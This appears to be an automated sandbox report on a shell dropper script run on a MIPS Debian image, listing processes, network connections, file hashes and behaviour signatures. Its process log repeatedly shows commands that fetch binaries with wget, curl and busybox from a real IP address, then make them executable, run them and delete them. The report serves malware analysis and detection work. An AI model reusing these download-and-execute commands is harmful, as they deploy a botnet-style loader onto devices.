[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 01:06
Reported
2024-10-28 01:09
Platform
debian9-mipsel-20240611-en
Max time kernel
67s
Max time network
69s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
Processes
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
